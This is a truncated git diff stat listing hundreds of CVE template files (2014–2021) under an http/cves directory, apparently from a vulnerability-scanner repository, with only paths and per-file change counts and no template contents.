http/cves/2014/CVE-2014-8682.yaml | 7 ++- http/cves/2014/CVE-2014-9094.yaml | 7 ++- http/cves/2014/CVE-2014-9180.yaml | 5 +- http/cves/2015/CVE-2015-1503.yaml | 15 ++++-- http/cves/2015/CVE-2015-1635.yaml | 5 +- http/cves/2015/CVE-2015-1880.yaml | 12 +++-- http/cves/2015/CVE-2015-20067.yaml | 2 +- http/cves/2015/CVE-2015-2067.yaml | 4 +- http/cves/2015/CVE-2015-2068.yaml | 4 +- http/cves/2015/CVE-2015-2794.yaml | 8 ++-- http/cves/2015/CVE-2015-2807.yaml | 6 +-- http/cves/2015/CVE-2015-3035.yaml | 4 +- http/cves/2015/CVE-2015-3897.yaml | 4 +- http/cves/2015/CVE-2015-4063.yaml | 2 +- http/cves/2015/CVE-2015-4127.yaml | 6 +-- http/cves/2015/CVE-2015-4455.yaml | 7 +-- http/cves/2015/CVE-2015-5469.yaml | 4 +- http/cves/2015/CVE-2015-6920.yaml | 5 +- http/cves/2015/CVE-2015-7297.yaml | 9 ++-- http/cves/2015/CVE-2015-7450.yaml | 4 +- http/cves/2015/CVE-2015-7780.yaml | 2 +- http/cves/2015/CVE-2015-7823.yaml | 8 ++-- http/cves/2015/CVE-2015-8399.yaml | 5 +- http/cves/2015/CVE-2015-9414.yaml | 7 ++- http/cves/2016/CVE-2016-0957.yaml | 4 +- http/cves/2016/CVE-2016-1000126.yaml | 8 ++-- http/cves/2016/CVE-2016-1000127.yaml | 6 +-- http/cves/2016/CVE-2016-1000128.yaml | 9 ++-- http/cves/2016/CVE-2016-1000129.yaml | 9 ++-- http/cves/2016/CVE-2016-1000130.yaml | 9 ++-- http/cves/2016/CVE-2016-1000131.yaml | 6 +-- http/cves/2016/CVE-2016-1000132.yaml | 7 ++- http/cves/2016/CVE-2016-1000133.yaml | 6 +-- http/cves/2016/CVE-2016-1000134.yaml | 9 ++-- http/cves/2016/CVE-2016-1000135.yaml | 13 +++--- http/cves/2016/CVE-2016-1000136.yaml | 12 ++--- http/cves/2016/CVE-2016-1000137.yaml | 6 +-- http/cves/2016/CVE-2016-1000138.yaml | 6 +-- http/cves/2016/CVE-2016-1000139.yaml | 7 ++- http/cves/2016/CVE-2016-1000140.yaml | 7 ++- http/cves/2016/CVE-2016-1000141.yaml | 8 ++-- http/cves/2016/CVE-2016-1000142.yaml | 6 +-- http/cves/2016/CVE-2016-1000143.yaml | 5 +- http/cves/2016/CVE-2016-1000146.yaml | 7 ++- http/cves/2016/CVE-2016-1000148.yaml | 6 +-- http/cves/2016/CVE-2016-1000149.yaml | 6 +-- http/cves/2016/CVE-2016-1000152.yaml | 7 ++- http/cves/2016/CVE-2016-1000153.yaml | 11 ++--- http/cves/2016/CVE-2016-1000154.yaml | 2 +- http/cves/2016/CVE-2016-1000155.yaml | 4 +- http/cves/2016/CVE-2016-10134.yaml | 10 +++- http/cves/2016/CVE-2016-10367.yaml | 4 +- http/cves/2016/CVE-2016-10993.yaml | 16 +++---- http/cves/2016/CVE-2016-2389.yaml | 4 +- http/cves/2016/CVE-2016-3081.yaml | 10 +++- http/cves/2016/CVE-2016-3088.yaml | 6 ++- http/cves/2016/CVE-2016-3978.yaml | 10 +++- http/cves/2016/CVE-2016-4975.yaml | 4 +- http/cves/2016/CVE-2016-4977.yaml | 4 +- http/cves/2016/CVE-2016-5674.yaml | 10 ++-- http/cves/2016/CVE-2016-6195.yaml | 15 ++++-- http/cves/2016/CVE-2016-6277.yaml | 4 +- http/cves/2016/CVE-2016-6601.yaml | 4 +- http/cves/2016/CVE-2016-7834.yaml | 2 +- http/cves/2016/CVE-2016-7981.yaml | 4 +- http/cves/2017/CVE-2017-10271.yaml | 4 +- http/cves/2017/CVE-2017-11165.yaml | 3 +- http/cves/2017/CVE-2017-11512.yaml | 4 +- http/cves/2017/CVE-2017-11610.yaml | 4 +- http/cves/2017/CVE-2017-11629.yaml | 2 +- http/cves/2017/CVE-2017-12149.yaml | 4 +- http/cves/2017/CVE-2017-12583.yaml | 5 +- http/cves/2017/CVE-2017-12611.yaml | 10 +++- http/cves/2017/CVE-2017-12615.yaml | 14 ++++-- http/cves/2017/CVE-2017-12617.yaml | 10 +++- http/cves/2017/CVE-2017-12629.yaml | 17 +++++-- http/cves/2017/CVE-2017-12635.yaml | 8 ++-- http/cves/2017/CVE-2017-12637.yaml | 4 +- http/cves/2017/CVE-2017-14135.yaml | 4 +- http/cves/2017/CVE-2017-14186.yaml | 10 +++- http/cves/2017/CVE-2017-15287.yaml | 2 +- http/cves/2017/CVE-2017-15715.yaml | 4 +- http/cves/2017/CVE-2017-15944.yaml | 6 ++- http/cves/2017/CVE-2017-16877.yaml | 7 ++- http/cves/2017/CVE-2017-16894.yaml | 9 +++- http/cves/2017/CVE-2017-17043.yaml | 4 +- http/cves/2017/CVE-2017-17059.yaml | 4 +- http/cves/2017/CVE-2017-17451.yaml | 4 +- http/cves/2017/CVE-2017-17731.yaml | 14 ++++-- http/cves/2017/CVE-2017-17736.yaml | 6 ++- http/cves/2017/CVE-2017-18487.yaml | 2 +- http/cves/2017/CVE-2017-18490.yaml | 4 +- http/cves/2017/CVE-2017-18491.yaml | 2 +- http/cves/2017/CVE-2017-18492.yaml | 2 +- http/cves/2017/CVE-2017-18493.yaml | 4 +- http/cves/2017/CVE-2017-18494.yaml | 2 +- http/cves/2017/CVE-2017-18496.yaml | 4 +- http/cves/2017/CVE-2017-18500.yaml | 2 +- http/cves/2017/CVE-2017-18501.yaml | 2 +- http/cves/2017/CVE-2017-18502.yaml | 2 +- http/cves/2017/CVE-2017-18505.yaml | 2 +- http/cves/2017/CVE-2017-18516.yaml | 2 +- http/cves/2017/CVE-2017-18517.yaml | 2 +- http/cves/2017/CVE-2017-18518.yaml | 2 +- http/cves/2017/CVE-2017-18527.yaml | 2 +- http/cves/2017/CVE-2017-18528.yaml | 2 +- http/cves/2017/CVE-2017-18529.yaml | 2 +- http/cves/2017/CVE-2017-18530.yaml | 2 +- http/cves/2017/CVE-2017-18532.yaml | 2 +- http/cves/2017/CVE-2017-18537.yaml | 2 +- http/cves/2017/CVE-2017-18542.yaml | 2 +- http/cves/2017/CVE-2017-18556.yaml | 2 +- http/cves/2017/CVE-2017-18557.yaml | 2 +- http/cves/2017/CVE-2017-18558.yaml | 2 +- http/cves/2017/CVE-2017-18562.yaml | 2 +- http/cves/2017/CVE-2017-18564.yaml | 2 +- http/cves/2017/CVE-2017-18565.yaml | 2 +- http/cves/2017/CVE-2017-18566.yaml | 2 +- http/cves/2017/CVE-2017-18598.yaml | 2 +- http/cves/2017/CVE-2017-3506.yaml | 4 +- http/cves/2017/CVE-2017-5521.yaml | 3 +- http/cves/2017/CVE-2017-5638.yaml | 11 ++++- http/cves/2017/CVE-2017-5689.yaml | 4 +- http/cves/2017/CVE-2017-6090.yaml | 8 +++- http/cves/2017/CVE-2017-7615.yaml | 4 +- http/cves/2017/CVE-2017-7855.yaml | 4 +- http/cves/2017/CVE-2017-8229.yaml | 13 ++++-- http/cves/2017/CVE-2017-8917.yaml | 6 ++- http/cves/2017/CVE-2017-9288.yaml | 5 +- http/cves/2017/CVE-2017-9416.yaml | 4 +- http/cves/2017/CVE-2017-9506.yaml | 4 +- http/cves/2017/CVE-2017-9791.yaml | 12 ++++- http/cves/2017/CVE-2017-9805.yaml | 10 +++- http/cves/2018/CVE-2018-0296.yaml | 4 +- http/cves/2018/CVE-2018-1000226.yaml | 2 +- http/cves/2018/CVE-2018-1000671.yaml | 4 +- http/cves/2018/CVE-2018-1000861.yaml | 5 +- http/cves/2018/CVE-2018-10095.yaml | 2 +- http/cves/2018/CVE-2018-10141.yaml | 4 +- http/cves/2018/CVE-2018-10230.yaml | 5 +- http/cves/2018/CVE-2018-10735.yaml | 5 +- http/cves/2018/CVE-2018-10736.yaml | 5 +- http/cves/2018/CVE-2018-10737.yaml | 5 +- http/cves/2018/CVE-2018-10738.yaml | 5 +- http/cves/2018/CVE-2018-10942.yaml | 2 +- http/cves/2018/CVE-2018-10956.yaml | 4 +- http/cves/2018/CVE-2018-11409.yaml | 4 +- http/cves/2018/CVE-2018-11759.yaml | 4 +- http/cves/2018/CVE-2018-11776.yaml | 10 +++- http/cves/2018/CVE-2018-11784.yaml | 10 +++- http/cves/2018/CVE-2018-12054.yaml | 4 +- http/cves/2018/CVE-2018-12296.yaml | 2 +- http/cves/2018/CVE-2018-12613.yaml | 9 +++- http/cves/2018/CVE-2018-1273.yaml | 4 +- http/cves/2018/CVE-2018-12909.yaml | 4 +- http/cves/2018/CVE-2018-13379.yaml | 10 +++- http/cves/2018/CVE-2018-13380.yaml | 10 +++- http/cves/2018/CVE-2018-14013.yaml | 12 +++-- http/cves/2018/CVE-2018-14064.yaml | 3 +- http/cves/2018/CVE-2018-14912.yaml | 4 +- http/cves/2018/CVE-2018-14918.yaml | 4 +- http/cves/2018/CVE-2018-15138.yaml | 3 +- http/cves/2018/CVE-2018-15917.yaml | 4 +- http/cves/2018/CVE-2018-15961.yaml | 10 +++- http/cves/2018/CVE-2018-16139.yaml | 4 +- http/cves/2018/CVE-2018-16159.yaml | 2 +- http/cves/2018/CVE-2018-16668.yaml | 2 +- http/cves/2018/CVE-2018-17422.yaml | 4 +- http/cves/2018/CVE-2018-18264.yaml | 4 +- http/cves/2018/CVE-2018-18608.yaml | 13 ++++-- http/cves/2018/CVE-2018-18778.yaml | 5 +- http/cves/2018/CVE-2018-18809.yaml | 4 +- http/cves/2018/CVE-2018-18925.yaml | 6 ++- http/cves/2018/CVE-2018-19287.yaml | 2 +- http/cves/2018/CVE-2018-19326.yaml | 4 +- http/cves/2018/CVE-2018-19365.yaml | 4 +- http/cves/2018/CVE-2018-19751.yaml | 4 +- http/cves/2018/CVE-2018-19877.yaml | 4 +- http/cves/2018/CVE-2018-20010.yaml | 4 +- http/cves/2018/CVE-2018-20462.yaml | 7 ++- http/cves/2018/CVE-2018-20526.yaml | 4 +- http/cves/2018/CVE-2018-20824.yaml | 6 ++- http/cves/2018/CVE-2018-2894.yaml | 4 +- http/cves/2018/CVE-2018-5230.yaml | 6 ++- http/cves/2018/CVE-2018-5233.yaml | 4 +- http/cves/2018/CVE-2018-5715.yaml | 14 ++++-- http/cves/2018/CVE-2018-6184.yaml | 5 +- http/cves/2018/CVE-2018-6200.yaml | 18 ++++++-- http/cves/2018/CVE-2018-6530.yaml | 2 +- http/cves/2018/CVE-2018-6605.yaml | 7 +-- http/cves/2018/CVE-2018-6910.yaml | 8 +++- http/cves/2018/CVE-2018-7282.yaml | 6 ++- http/cves/2018/CVE-2018-7314.yaml | 7 +-- http/cves/2018/CVE-2018-7422.yaml | 2 +- http/cves/2018/CVE-2018-7600.yaml | 4 +- http/cves/2018/CVE-2018-7602.yaml | 4 +- http/cves/2018/CVE-2018-7653.yaml | 8 +++- http/cves/2018/CVE-2018-7700.yaml | 15 ++++-- http/cves/2018/CVE-2018-8006.yaml | 4 +- http/cves/2018/CVE-2018-8033.yaml | 8 +++- http/cves/2018/CVE-2018-8727.yaml | 2 +- http/cves/2018/CVE-2018-8770.yaml | 5 +- http/cves/2018/CVE-2018-8823.yaml | 2 +- http/cves/2018/CVE-2018-9845.yaml | 3 +- http/cves/2019/CVE-2019-0193.yaml | 13 ++++-- http/cves/2019/CVE-2019-0221.yaml | 10 +++- http/cves/2019/CVE-2019-0230.yaml | 14 ++++-- http/cves/2019/CVE-2019-10092.yaml | 4 +- http/cves/2019/CVE-2019-10098.yaml | 4 +- http/cves/2019/CVE-2019-1010287.yaml | 2 +- http/cves/2019/CVE-2019-10405.yaml | 5 +- http/cves/2019/CVE-2019-10717.yaml | 4 +- http/cves/2019/CVE-2019-10758.yaml | 4 +- http/cves/2019/CVE-2019-11248.yaml | 4 +- http/cves/2019/CVE-2019-11370.yaml | 4 +- http/cves/2019/CVE-2019-11510.yaml | 10 ++-- http/cves/2019/CVE-2019-11580.yaml | 4 +- http/cves/2019/CVE-2019-11581.yaml | 6 ++- http/cves/2019/CVE-2019-12581.yaml | 8 ++-- http/cves/2019/CVE-2019-12593.yaml | 16 +++++-- http/cves/2019/CVE-2019-12616.yaml | 9 +++- http/cves/2019/CVE-2019-12962.yaml | 4 +- http/cves/2019/CVE-2019-12985.yaml | 4 +- http/cves/2019/CVE-2019-12986.yaml | 4 +- http/cves/2019/CVE-2019-12987.yaml | 4 +- http/cves/2019/CVE-2019-12988.yaml | 4 +- http/cves/2019/CVE-2019-12990.yaml | 4 +- http/cves/2019/CVE-2019-14322.yaml | 2 +- http/cves/2019/CVE-2019-14470.yaml | 11 ++--- http/cves/2019/CVE-2019-14530.yaml | 11 ++++- http/cves/2019/CVE-2019-14750.yaml | 15 ++++-- http/cves/2019/CVE-2019-14974.yaml | 16 +++++-- http/cves/2019/CVE-2019-15043.yaml | 9 +++- http/cves/2019/CVE-2019-15501.yaml | 4 +- http/cves/2019/CVE-2019-15642.yaml | 4 +- http/cves/2019/CVE-2019-15713.yaml | 12 +++-- http/cves/2019/CVE-2019-15829.yaml | 2 +- http/cves/2019/CVE-2019-15859.yaml | 2 +- http/cves/2019/CVE-2019-15889.yaml | 4 +- http/cves/2019/CVE-2019-16057.yaml | 4 +- http/cves/2019/CVE-2019-16332.yaml | 7 ++- http/cves/2019/CVE-2019-16469.yaml | 12 +++-- http/cves/2019/CVE-2019-16525.yaml | 3 +- http/cves/2019/CVE-2019-16759.yaml | 19 ++++++-- http/cves/2019/CVE-2019-16932.yaml | 9 ++-- http/cves/2019/CVE-2019-17382.yaml | 14 ++++-- http/cves/2019/CVE-2019-17558.yaml | 13 ++++-- http/cves/2019/CVE-2019-17574.yaml | 2 +- http/cves/2019/CVE-2019-18393.yaml | 12 +++-- http/cves/2019/CVE-2019-18394.yaml | 12 +++-- http/cves/2019/CVE-2019-18922.yaml | 4 +- http/cves/2019/CVE-2019-1898.yaml | 6 +-- http/cves/2019/CVE-2019-19134.yaml | 2 +- http/cves/2019/CVE-2019-1943.yaml | 4 +- http/cves/2019/CVE-2019-20183.yaml | 4 +- http/cves/2019/CVE-2019-20933.yaml | 9 ++-- http/cves/2019/CVE-2019-2767.yaml | 2 +- http/cves/2019/CVE-2019-3396.yaml | 5 +- http/cves/2019/CVE-2019-3398.yaml | 8 ++-- http/cves/2019/CVE-2019-3401.yaml | 6 ++- http/cves/2019/CVE-2019-3402.yaml | 6 ++- http/cves/2019/CVE-2019-3403.yaml | 6 ++- http/cves/2019/CVE-2019-3911.yaml | 5 +- http/cves/2019/CVE-2019-3912.yaml | 5 +- http/cves/2019/CVE-2019-5418.yaml | 4 +- http/cves/2019/CVE-2019-5434.yaml | 8 +++- http/cves/2019/CVE-2019-6340.yaml | 4 +- http/cves/2019/CVE-2019-6799.yaml | 14 ++++-- http/cves/2019/CVE-2019-6802.yaml | 4 +- http/cves/2019/CVE-2019-7139.yaml | 5 +- http/cves/2019/CVE-2019-7192.yaml | 16 +++++-- http/cves/2019/CVE-2019-7254.yaml | 4 +- http/cves/2019/CVE-2019-7255.yaml | 4 +- http/cves/2019/CVE-2019-7256.yaml | 4 +- http/cves/2019/CVE-2019-7481.yaml | 4 +- http/cves/2019/CVE-2019-8086.yaml | 5 +- http/cves/2019/CVE-2019-8442.yaml | 6 ++- http/cves/2019/CVE-2019-8446.yaml | 4 +- http/cves/2019/CVE-2019-8449.yaml | 6 ++- http/cves/2019/CVE-2019-8451.yaml | 4 +- http/cves/2019/CVE-2019-8903.yaml | 4 +- http/cves/2019/CVE-2019-8937.yaml | 12 +++-- http/cves/2019/CVE-2019-9632.yaml | 9 ++-- http/cves/2019/CVE-2019-9670.yaml | 12 +++-- http/cves/2019/CVE-2019-9978.yaml | 2 +- http/cves/2020/CVE-2020-10148.yaml | 4 +- http/cves/2020/CVE-2020-10220.yaml | 4 +- http/cves/2020/CVE-2020-10548.yaml | 6 ++- http/cves/2020/CVE-2020-10770.yaml | 10 +++- http/cves/2020/CVE-2020-10973.yaml | 6 ++- http/cves/2020/CVE-2020-11034.yaml | 8 +++- http/cves/2020/CVE-2020-11110.yaml | 11 +++-- http/cves/2020/CVE-2020-11546.yaml | 4 +- http/cves/2020/CVE-2020-11547.yaml | 4 +- http/cves/2020/CVE-2020-11798.yaml | 4 +- http/cves/2020/CVE-2020-11930.yaml | 2 +- http/cves/2020/CVE-2020-11978.yaml | 15 ++++-- http/cves/2020/CVE-2020-11991.yaml | 4 +- http/cves/2020/CVE-2020-12127.yaml | 4 +- http/cves/2020/CVE-2020-12256.yaml | 4 +- http/cves/2020/CVE-2020-12259.yaml | 4 +- http/cves/2020/CVE-2020-12720.yaml | 14 ++++-- http/cves/2020/CVE-2020-13379.yaml | 9 +++- http/cves/2020/CVE-2020-13405.yaml | 8 +++- http/cves/2020/CVE-2020-13638.yaml | 4 +- http/cves/2020/CVE-2020-13700.yaml | 3 +- http/cves/2020/CVE-2020-13820.yaml | 4 +- http/cves/2020/CVE-2020-13851.yaml | 8 ++-- http/cves/2020/CVE-2020-13927.yaml | 15 ++++-- http/cves/2020/CVE-2020-13945.yaml | 2 +- http/cves/2020/CVE-2020-14144.yaml | 10 +++- http/cves/2020/CVE-2020-14179.yaml | 4 +- http/cves/2020/CVE-2020-14181.yaml | 4 +- http/cves/2020/CVE-2020-14408.yaml | 8 +++- http/cves/2020/CVE-2020-14750.yaml | 9 +++- http/cves/2020/CVE-2020-14882.yaml | 4 +- http/cves/2020/CVE-2020-14883.yaml | 5 +- http/cves/2020/CVE-2020-15050.yaml | 2 +- http/cves/2020/CVE-2020-15129.yaml | 4 +- http/cves/2020/CVE-2020-15227.yaml | 4 +- http/cves/2020/CVE-2020-15867.yaml | 6 ++- http/cves/2020/CVE-2020-15895.yaml | 4 +- http/cves/2020/CVE-2020-17496.yaml | 14 ++++-- http/cves/2020/CVE-2020-17526.yaml | 15 ++++-- http/cves/2020/CVE-2020-17530.yaml | 10 +++- http/cves/2020/CVE-2020-19282.yaml | 2 +- http/cves/2020/CVE-2020-19295.yaml | 6 ++- http/cves/2020/CVE-2020-1943.yaml | 8 +++- http/cves/2020/CVE-2020-20300.yaml | 13 ++++-- http/cves/2020/CVE-2020-2036.yaml | 4 +- http/cves/2020/CVE-2020-2096.yaml | 4 +- http/cves/2020/CVE-2020-2103.yaml | 5 +- http/cves/2020/CVE-2020-21224.yaml | 4 +- http/cves/2020/CVE-2020-22208.yaml | 4 +- http/cves/2020/CVE-2020-22209.yaml | 4 +- http/cves/2020/CVE-2020-22210.yaml | 4 +- http/cves/2020/CVE-2020-22211.yaml | 4 +- http/cves/2020/CVE-2020-22840.yaml | 5 +- http/cves/2020/CVE-2020-23517.yaml | 8 +++- http/cves/2020/CVE-2020-24148.yaml | 2 +- http/cves/2020/CVE-2020-24701.yaml | 4 +- http/cves/2020/CVE-2020-24902.yaml | 8 +++- http/cves/2020/CVE-2020-24903.yaml | 4 +- http/cves/2020/CVE-2020-25495.yaml | 4 +- http/cves/2020/CVE-2020-2551.yaml | 4 +- http/cves/2020/CVE-2020-25780.yaml | 4 +- http/cves/2020/CVE-2020-25864.yaml | 4 +- http/cves/2020/CVE-2020-26153.yaml | 11 +++-- http/cves/2020/CVE-2020-26258.yaml | 2 +- http/cves/2020/CVE-2020-26413.yaml | 5 +- http/cves/2020/CVE-2020-2733.yaml | 4 +- http/cves/2020/CVE-2020-27467.yaml | 4 +- http/cves/2020/CVE-2020-27838.yaml | 13 ++++-- http/cves/2020/CVE-2020-27982.yaml | 15 ++++-- http/cves/2020/CVE-2020-28185.yaml | 4 +- http/cves/2020/CVE-2020-28351.yaml | 8 ++-- http/cves/2020/CVE-2020-28871.yaml | 4 +- http/cves/2020/CVE-2020-28976.yaml | 5 +- http/cves/2020/CVE-2020-29395.yaml | 17 +++++-- http/cves/2020/CVE-2020-29453.yaml | 4 +- http/cves/2020/CVE-2020-29583.yaml | 4 +- http/cves/2020/CVE-2020-35476.yaml | 4 +- http/cves/2020/CVE-2020-35729.yaml | 4 +- http/cves/2020/CVE-2020-35749.yaml | 5 +- http/cves/2020/CVE-2020-35846.yaml | 8 +++- http/cves/2020/CVE-2020-35847.yaml | 8 +++- http/cves/2020/CVE-2020-35848.yaml | 8 +++- http/cves/2020/CVE-2020-35985.yaml | 2 +- http/cves/2020/CVE-2020-35986.yaml | 2 +- http/cves/2020/CVE-2020-36289.yaml | 4 +- http/cves/2020/CVE-2020-36365.yaml | 4 +- http/cves/2020/CVE-2020-36510.yaml | 3 +- http/cves/2020/CVE-2020-5284.yaml | 4 +- http/cves/2020/CVE-2020-5776.yaml | 8 ++-- http/cves/2020/CVE-2020-5777.yaml | 4 +- http/cves/2020/CVE-2020-5902.yaml | 2 +- http/cves/2020/CVE-2020-6637.yaml | 4 +- http/cves/2020/CVE-2020-6950.yaml | 10 +++- http/cves/2020/CVE-2020-7107.yaml | 4 +- http/cves/2020/CVE-2020-7209.yaml | 4 +- http/cves/2020/CVE-2020-7796.yaml | 12 +++-- http/cves/2020/CVE-2020-7961.yaml | 4 +- http/cves/2020/CVE-2020-7980.yaml | 4 +- http/cves/2020/CVE-2020-8115.yaml | 8 +++- http/cves/2020/CVE-2020-8194.yaml | 7 ++- http/cves/2020/CVE-2020-8512.yaml | 4 +- http/cves/2020/CVE-2020-8615.yaml | 2 +- http/cves/2020/CVE-2020-8654.yaml | 4 +- http/cves/2020/CVE-2020-8771.yaml | 5 +- http/cves/2020/CVE-2020-8813.yaml | 14 ++++-- http/cves/2020/CVE-2020-9054.yaml | 4 +- http/cves/2020/CVE-2020-9344.yaml | 4 +- http/cves/2020/CVE-2020-9484.yaml | 14 ++++-- http/cves/2020/CVE-2020-9496.yaml | 8 +++- http/cves/2020/CVE-2020-9757.yaml | 13 ++++-- http/cves/2021/CVE-2021-1472.yaml | 4 +- http/cves/2021/CVE-2021-20092.yaml | 2 +- http/cves/2021/CVE-2021-20123.yaml | 4 +- http/cves/2021/CVE-2021-20124.yaml | 4 +- http/cves/2021/CVE-2021-20150.yaml | 4 +- http/cves/2021/CVE-2021-20158.yaml | 8 +++- http/cves/2021/CVE-2021-20323.yaml | 11 ++++- http/cves/2021/CVE-2021-20837.yaml | 4 +- http/cves/2021/CVE-2021-21087.yaml | 10 +++- http/cves/2021/CVE-2021-21287.yaml | 14 ++++-- http/cves/2021/CVE-2021-21311.yaml | 14 ++++-- http/cves/2021/CVE-2021-21402.yaml | 11 ++++- http/cves/2021/CVE-2021-21799.yaml | 4 +- http/cves/2021/CVE-2021-21800.yaml | 4 +- http/cves/2021/CVE-2021-21805.yaml | 4 +- http/cves/2021/CVE-2021-21985.yaml | 4 +- http/cves/2021/CVE-2021-22054.yaml | 4 +- http/cves/2021/CVE-2021-22122.yaml | 3 ++ http/cves/2021/CVE-2021-22205.yaml | 9 ++-- http/cves/2021/CVE-2021-22214.yaml | 5 +- http/cves/2021/CVE-2021-22502.yaml | 4 +- http/cves/2021/CVE-2021-22707.yaml | 8 +++- http/cves/2021/CVE-2021-22873.yaml | 8 +++- http/cves/2021/CVE-2021-22911.yaml | 4 +- http/cves/2021/CVE-2021-24155.yaml | 5 +- http/cves/2021/CVE-2021-24165.yaml | 2 +- http/cves/2021/CVE-2021-24176.yaml | 4 +- http/cves/2021/CVE-2021-24214.yaml | 4 +- http/cves/2021/CVE-2021-24215.yaml | 2 +- http/cves/2021/CVE-2021-24226.yaml | 2 +- http/cves/2021/CVE-2021-24239.yaml | 4 +- http/cves/2021/CVE-2021-24245.yaml | 5 +- http/cves/2021/CVE-2021-24275.yaml | 4 +- http/cves/2021/CVE-2021-24276.yaml | 2 +- http/cves/2021/CVE-2021-24284.yaml | 5 +- http/cves/2021/CVE-2021-24291.yaml | 2 +- http/cves/2021/CVE-2021-24298.yaml | 5 +- http/cves/2021/CVE-2021-24320.yaml | 4 +- http/cves/2021/CVE-2021-24335.yaml | 5 +- http/cves/2021/CVE-2021-24340.yaml | 4 +- http/cves/2021/CVE-2021-24342.yaml | 3 +- http/cves/2021/CVE-2021-24364.yaml | 3 +- http/cves/2021/CVE-2021-24387.yaml | 2 +- http/cves/2021/CVE-2021-24407.yaml | 3 +- http/cves/2021/CVE-2021-24409.yaml | 2 +- http/cves/2021/CVE-2021-24442.yaml | 4 +- http/cves/2021/CVE-2021-24472.yaml | 6 +-- http/cves/2021/CVE-2021-24627.yaml | 2 +- http/cves/2021/CVE-2021-24827.yaml | 5 +- http/cves/2021/CVE-2021-24849.yaml | 4 +- http/cves/2021/CVE-2021-24891.yaml | 4 +- http/cves/2021/CVE-2021-24915.yaml | 2 +- http/cves/2021/CVE-2021-24943.yaml | 4 +- http/cves/2021/CVE-2021-24979.yaml | 2 +- http/cves/2021/CVE-2021-24997.yaml | 2 +- http/cves/2021/CVE-2021-25016.yaml | 4 +- http/cves/2021/CVE-2021-25055.yaml | 2 +- http/cves/2021/CVE-2021-25065.yaml | 2 +- http/cves/2021/CVE-2021-25074.yaml | 2 +- http/cves/2021/CVE-2021-25114.yaml | 4 +- http/cves/2021/CVE-2021-25296.yaml | 8 +++- http/cves/2021/CVE-2021-25297.yaml | 8 +++- http/cves/2021/CVE-2021-25298.yaml | 8 +++- http/cves/2021/CVE-2021-25299.yaml | 8 +++- http/cves/2021/CVE-2021-25864.yaml | 4 +- http/cves/2021/CVE-2021-25899.yaml | 8 ++-- http/cves/2021/CVE-2021-26084.yaml | 4 +- http/cves/2021/CVE-2021-26085.yaml | 4 +- http/cves/2021/CVE-2021-26086.yaml | 4 +- http/cves/2021/CVE-2021-26247.yaml | 14 ++++-- http/cves/2021/CVE-2021-26292.yaml | 4 +- http/cves/2021/CVE-2021-26294.yaml | 4 +- http/cves/2021/CVE-2021-26295.yaml | 9 +++- http/cves/2021/CVE-2021-26598.yaml | 5 +- http/cves/2021/CVE-2021-26855.yaml | 10 +++- http/cves/2021/CVE-2021-27310.yaml | 2 +- http/cves/2021/CVE-2021-27330.yaml | 6 ++- http/cves/2021/CVE-2021-27358.yaml | 9 +++- http/cves/2021/CVE-2021-27519.yaml | 9 +++- http/cves/2021/CVE-2021-27520.yaml | 9 +++- http/cves/2021/CVE-2021-27670.yaml | 8 ++-- http/cves/2021/CVE-2021-27905.yaml | 13 ++++-- http/cves/2021/CVE-2021-27909.yaml | 4 +- http/cves/2021/CVE-2021-28151.yaml | 4 +- http/cves/2021/CVE-2021-29006.yaml | 4 +- http/cves/2021/CVE-2021-29156.yaml | 4 +- http/cves/2021/CVE-2021-29200.yaml | 10 +++- http/cves/2021/CVE-2021-29484.yaml | 4 +- http/cves/2021/CVE-2021-29625.yaml | 16 ++++--- http/cves/2021/CVE-2021-30128.yaml | 9 +++- http/cves/2021/CVE-2021-30151.yaml | 4 +- http/cves/2021/CVE-2021-30461.yaml | 4 +- http/cves/2021/CVE-2021-31195.yaml | 14 ++++-- http/cves/2021/CVE-2021-3129.yaml | 4 +- http/cves/2021/CVE-2021-31589.yaml | 4 +- http/cves/2021/CVE-2021-31602.yaml | 4 +- http/cves/2021/CVE-2021-31682.yaml | 4 +- http/cves/2021/CVE-2021-31805.yaml | 10 +++- http/cves/2021/CVE-2021-3223.yaml | 8 +++- http/cves/2021/CVE-2021-32682.yaml | 4 +- http/cves/2021/CVE-2021-32819.yaml | 4 +- http/cves/2021/CVE-2021-3293.yaml | 2 +- http/cves/2021/CVE-2021-33544.yaml | 4 +- http/cves/2021/CVE-2021-33690.yaml | 4 +- http/cves/2021/CVE-2021-34473.yaml | 10 +++- http/cves/2021/CVE-2021-35250.yaml | 4 +- http/cves/2021/CVE-2021-35265.yaml | 4 +- http/cves/2021/CVE-2021-35323.yaml | 9 +++- http/cves/2021/CVE-2021-35380.yaml | 4 +- http/cves/2021/CVE-2021-35464.yaml | 4 +- http/cves/2021/CVE-2021-35488.yaml | 8 +++- http/cves/2021/CVE-2021-35587.yaml | 9 +++- http/cves/2021/CVE-2021-36450.yaml | 6 ++- http/cves/2021/CVE-2021-36580.yaml | 4 +- http/cves/2021/CVE-2021-37304.yaml | 9 +++- http/cves/2021/CVE-2021-37305.yaml | 9 +++- http/cves/2021/CVE-2021-37416.yaml | 13 ++++-- http/cves/2021/CVE-2021-37538.yaml | 4 +- http/cves/2021/CVE-2021-37833.yaml | 8 +++- http/cves/2021/CVE-2021-38540.yaml | 15 ++++-- http/cves/2021/CVE-2021-38647.yaml | 4 +- http/cves/2021/CVE-2021-38704.yaml | 4 +- http/cves/2021/CVE-2021-38751.yaml | 6 ++- http/cves/2021/CVE-2021-39146.yaml | 2 +- http/cves/2021/CVE-2021-39152.yaml | 2 +- http/cves/2021/CVE-2021-39211.yaml | 8 +++- http/cves/2021/CVE-2021-39226.yaml | 9 +++- http/cves/2021/CVE-2021-39327.yaml | 4 +- http/cves/2021/CVE-2021-39350.yaml | 5 +- http/cves/2021/CVE-2021-39501.yaml | 4 +- http/cves/2021/CVE-2021-40149.yaml | 6 +-- http/cves/2021/CVE-2021-40150.yaml | 4 +- http/cves/2021/CVE-2021-40438.yaml | 4 +- http/cves/2021/CVE-2021-40539.yaml | 12 +++-- http/cves/2021/CVE-2021-40542.yaml | 4 +- http/cves/2021/CVE-2021-40651.yaml | 4 +- http/cves/2021/CVE-2021-40661.yaml | 4 +- http/cves/2021/CVE-2021-40822.yaml | 13 ++++-- http/cves/2021/CVE-2021-40875.yaml | 4 +- http/cves/2021/CVE-2021-40968.yaml | 4 +- http/cves/2021/CVE-2021-40969.yaml | 8 ++-- http/cves/2021/CVE-2021-40970.yaml | 4 +- http/cves/2021/CVE-2021-40971.yaml | 8 ++-- http/cves/2021/CVE-2021-40972.yaml | 4 +- http/cves/2021/CVE-2021-40973.yaml | 4 +- http/cves/2021/CVE-2021-41174.yaml | 9 +++- http/cves/2021/CVE-2021-41277.yaml | 13 